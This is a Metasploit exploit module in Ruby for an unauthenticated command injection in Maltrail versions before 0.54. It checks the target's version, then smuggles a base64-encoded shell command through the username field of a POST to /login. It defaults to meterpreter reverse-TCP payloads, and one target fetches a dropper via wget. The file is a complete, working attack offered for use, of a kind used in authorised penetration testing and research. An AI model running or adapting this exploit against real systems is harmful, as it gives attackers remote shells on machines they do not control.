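##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Maltrail Unauthenticated Command Injection',
        'Description' => %q{
          Maltrail is a malicious traffic detection system, utilizing publicly
          available blacklists containing malicious and/or generally suspicious trails.
          The Maltrail versions < 0.54 is suffering from a command injection vulnerability.
          The `subprocess.check_output` function in `mailtrail/core/http.py` contains
          a command injection vulnerability in the `params.get("username")` parameter.
          An attacker can exploit this vulnerability by injecting arbitrary OS commands
          into the username parameter. The injected commands will be executed with the
          privileges of the running process. This vulnerability can be exploited remotely
          without authentication.

          Successfully tested against Maltrail versions 0.52 and 0.53.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Ege BALCI <egebalci[at]pm.me>', # msf module
          'Chris Wild', # original PoC, analysis
        ],
        'References' => [
          ['EDB', '51676'],
          ['URL', 'https://huntr.dev/bounties/be3c5204-fbd9-448d-b97c-96a8d2941e87/'],
          ['URL', 'https://github.com/stamparm/maltrail/issues/19146']
        ],
        'Platform' => ['unix', 'linux'],
        'Privileged' => false,
        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
        'Targets' => [
          [
            'Unix Command',
            {
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
              'Type' => :unix_cmd,
              'DefaultOptions' => {
                'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_tcp'
              }
            }
          ],
          [
            'Linux Dropper',
            {
              'Platform' => 'linux',
              'Arch' => [ARCH_X86, ARCH_X64],
              'Type' => :linux_dropper,
              'CmdStagerFlavor' => :wget,
              'DefaultOptions' => {
                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
              }
            }
          ]
        ],
        'DisclosureDate' => '2023-07-31',
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          # NOTE(review): the POST to /login below may be recorded server-side;
          # confirm against Maltrail's logging before leaving this empty.
          'SideEffects' => []
        }
      )
    )
    register_options(
      [
        Opt::RPORT(8338),
        OptString.new('TARGETURI', [ true, 'The URI of the Maltrail server', '/'])
      ]
    )
  end

  # Fetches the landing page and reads the version string it embeds.
  # Returns Unknown when there is no usable response or no version can be
  # found, Appears for versions below 0.54, Safe otherwise.
  def check
    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path),
      'method' => 'GET'
    )
    return CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?
    return CheckCode::Unknown("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200

    # The page renders its version as "(v<b>X.Y</b>)".
    version = Rex::Version.new(Regexp.last_match(1)) if res.body =~ %r{\(v<b>([0-9.]+)</b>\)}
    # A 200 from a non-Maltrail page (or a changed banner) leaves `version` nil;
    # without this guard the comparison below raised NoMethodError.
    return CheckCode::Unknown("#{peer} - Could not determine Maltrail version from response") if version.nil?

    if version < Rex::Version.new('0.54')
      return CheckCode::Appears("Version Detected: #{version}")
    end

    CheckCode::Safe("Version Detected: #{version}")
  end

  # Sends `cmd` through the username parameter of the login endpoint.
  # `_opts` is accepted for CmdStager compatibility and is unused.
  def execute_command(cmd, _opts = {})
    send_request_raw( # This needs to be a raw request because we don't want the body URL-encoded
      'uri' => normalize_uri(target_uri.path, 'login'),
      'method' => 'POST',
      'headers' => {
        'ctype' => 'application/x-www-form-urlencoded'
      },
      'data' => "username=;`echo+\"#{Rex::Text.encode_base64(cmd)}\"+|+base64+-d+|+sh;#`" # We also need all the +
    )
  end

  # Dispatches on the selected target's 'Type' (see 'Targets' above).
  def exploit
    case target['Type']
    when :unix_cmd
      print_status("Executing #{target.name}...")
      execute_command(payload.encoded)
    when :linux_dropper
      print_status("Executing #{target.name}...")
      execute_cmdstager
    end
  end
end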